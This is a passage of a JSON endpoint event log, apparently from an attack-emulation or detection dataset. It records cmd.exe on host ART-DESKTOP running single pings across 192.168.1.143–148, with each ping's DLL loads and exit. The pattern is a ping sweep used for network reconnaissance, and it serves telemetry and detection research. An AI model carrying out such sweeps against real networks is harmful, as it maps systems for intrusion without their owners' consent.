"{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "process", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572681990000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.143", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2908, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572682130000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "process", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572686830000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.144", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4956, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "process", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572691990000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.145", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3152, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572692130000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "process", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572696830000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.146", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3324, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572697029984, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "process", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572701990000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.147", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4548, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "process", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572706830000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.148", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5296, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572706990000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "process", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", 